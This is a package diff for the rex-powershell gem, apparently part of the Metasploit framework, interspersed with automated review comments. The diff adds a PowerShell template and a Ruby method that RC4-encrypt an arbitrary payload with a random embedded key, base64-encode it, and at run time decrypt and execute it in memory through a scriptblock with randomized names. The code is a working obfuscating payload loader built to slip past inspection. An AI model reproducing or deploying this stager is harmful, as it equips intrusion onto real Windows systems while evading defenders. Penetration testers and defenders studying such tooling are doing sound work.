rex-powershell 0.1.86 → 0.1.87

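--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: 2d26075990237181aafd00190e76bac14acdee1393e77231d0f1f24f3122dc36
-data.tar.gz: d3b8f606d7b8cfc376d4ea7e71461008336d0aa9ffcbab1ed70f1ff9bf41c5fa
+metadata.gz: 764fea22dc597fbfbf2af172ae81f6dccebf23d280d94683cd3220987565e567
+data.tar.gz: df359a4703480f97a0353d840283099960fca5db2679cc67a812ffe0d7a8770b
 SHA512:
-metadata.gz: 1c0f6e5aada793a549fb022bead14e6e1996f17ef786d796bbe194daca9d65db78842e56036b0dcf7d938505f71860f1408603103b96199fa3c924443bfb44a6
-data.tar.gz: d16cc849d1fb7121e86a9bf267a07bd2dc717fc448ae8797f939c4461a08a857694aa5a3e5ebda5d6c7ca4fe2c17af678d7ceea15cf92a4b7118f50131c8895a
+metadata.gz: e491690da3d3fc1d0c4be168b6029d612da06b5012d05f4f7ad9aea85aaa088d154ce37f499244b765072e60067c87a13b25c3d356e8313092602ca4416a5e06
+data.tar.gz: e8b2607028adf09d185abf0c0833240c3232198c78f9ff928b0c8936ec4592c7c88a988c96bdaf8dac26da33ff1e6d510297283bf276e2bc2bdb0fb0af489a67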
Binary file
data.tar.gz.sig CHANGED
Binary file
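--- /dev/null
+++ b/data/templates/to_mem_rc4.ps1.template
@@ -0,0 +1,40 @@
+function %{func_rc4_decrypt} {
+param([Byte[]]$%{var_rc4buffer})
+
+$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
+
+$s = New-Object Byte[] 256;
+$k = New-Object Byte[] 256;
+
+for ($i = 0; $i -lt 256; $i++)
+{
+$s[$i] = [Byte]$i;
+$k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
+}
+
+$j = 0;
+for ($i = 0; $i -lt 256; $i++)
+{
+$j = ($j + $s[$i] + $k[$i]) %% 256;
+$temp = $s[$i];
+$s[$i] = $s[$j];
+$s[$j] = $temp;
+}
+
+$i = $j = 0;
+for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
+{
+$i = ($i + 1) %% 256;
+$j = ($j + $s[$i]) %% 256;
+$temp = $s[$i];
+$s[$i] = $s[$j];
+$s[$j] = $temp;
+[int]$t = ($s[$i] + $s[$j]) %% 256;
+$%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
+}
+
+$%{var_rc4buffer}
+}
+
+&([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
+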
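Review bot: The doubled `%%` in the modulus expressions on template lines 12, 18, 27, 28 and 32 (`$i %% $%{var_key}.Length`, `... %% 256`) is not valid PowerShell as written and presumably survives only because the template is rendered through Ruby's `%` substitution, which collapses `%%` to `%`; nothing in the file says so, and a reader is likely to "correct" it back to a single `%` and break the generated script. Since every line of this template is emitted verbatim into the generated script, the explanation belongs beside the `%{}` placeholders in the Ruby method that renders it rather than as a comment here; a one-line note there such as `# template is rendered with String#% — a literal % in the PowerShell must be written %% in the .template file` would suffice.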
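--- a/lib/rex/powershell/payload.rb
+++ b/lib/rex/powershell/payload.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/random_identifier'
+require 'rc4'
 
 module Rex
 module Powershell
@@ -106,6 +107,27 @@ module Payload
 read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
 end
 
+#
+# PSH script that executes an RC4 encrypted payload with Invoke-Expression
+# by Adrian Vollmer (SySS GmbH, https://www.syss.de)
+#
+def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
+rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
+rig.init_var(:func_rc4_decrypt)
+rig.init_var(:var_rc4buffer)
+rig.init_var(:var_key)
+
+key = Rex::Text.rand_text_alpha(rand(8)+8)
+rc4 = RC4.new(key)
+enc_code = rc4.encrypt(code)
+
+hash_sub = rig.to_h
+hash_sub[:random_key] = key
+hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
+
+read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+end
+
 end
 end
 end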
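Review bot: The header comment above `to_win32pe_psh_rc4` says the payload is run "with Invoke-Expression", but the template it renders (to_mem_rc4.ps1.template, added in this same commit) invokes the decoded text via `&([scriptblock]::create(...))`, so the comment is inaccurate. It should also state what a reader needs to know about the key: `key` is copied into the generated script in clear text next to the ciphertext (`hash_sub[:random_key] = key`), so the RC4 layer is an encoding step, not a confidentiality control, and `rand_text_alpha` is presumably chosen so the key can sit inside the template's double-quoted PowerShell string without escaping. Suggested replacement for the two comment lines: `# PSH script that decodes an RC4-obfuscated payload (the key is embedded in the script itself) and runs it via &([scriptblock]::create(...))` and `# by Adrian Vollmer (SySS GmbH, https://www.syss.de)`. The `rand(8)+8` expression would read better with a note that it yields an 8–15 character key, and `code` is presumably a binary string (the file is `coding: binary`) — worth stating in the comment.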
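--- a/lib/rex/powershell/version.rb
+++ b/lib/rex/powershell/version.rb
@@ -1,5 +1,5 @@
 module Rex
 module Powershell
-VERSION = "0.1.86"
+VERSION = "0.1.87"
 end
 end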
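--- a/rex-powershell.gemspec
+++ b/rex-powershell.gemspec
@@ -26,4 +26,5 @@ Gem::Specification.new do |spec|
 
 spec.add_runtime_dependency 'rex-text'
 spec.add_runtime_dependency 'rex-random_identifier'
+spec.add_runtime_dependency 'ruby-rc4'
 end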
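Review bot: The new `spec.add_runtime_dependency 'ruby-rc4'` line carries no version constraint, so any future release of that third-party gem, including a breaking or malicious one, will satisfy resolvers; the generated metadata hunk in this commit confirms the requirement is `>= 0`. A pessimistic constraint, `spec.add_runtime_dependency 'ruby-rc4', '~> <current minor>'` (placeholder for the version actually tested against), would bound that. The neighbouring `rex-text` and `rex-random_identifier` lines are equally unconstrained, so this matches the file's existing style; if the project's policy is to leave its own rex gems unpinned, the externally maintained gem is still the one most worth bounding.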
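--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-version: 0.1.86
+version: 0.1.87
 platform: ruby
 authors:
 - David 'thelightcosine' Maloney
@@ -93,7 +93,7 @@ cert_chain:
 JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
 DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
 -----END CERTIFICATE-----
-date: 2020-02-17 00:00:00.000000000 Z
+date: 2020-02-21 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: bundler
@@ -165,6 +165,20 @@ dependencies:
 - - ">="
 - !ruby/object:Gem::Version
 version: '0'
+- !ruby/object:Gem::Dependency
+name: ruby-rc4
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+type: :runtime
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
 description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
 scripts
 email:
@@ -185,6 +199,7 @@ files:
 - data/templates/to_mem_msil.ps1.template
 - data/templates/to_mem_old.ps1.template
 - data/templates/to_mem_pshreflection.ps1.template
+- data/templates/to_mem_rc4.ps1.template
 - lib/rex/powershell.rb
 - lib/rex/powershell/command.rb
 - lib/rex/powershell/function.rb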
metadata.gz.sig CHANGED
Binary file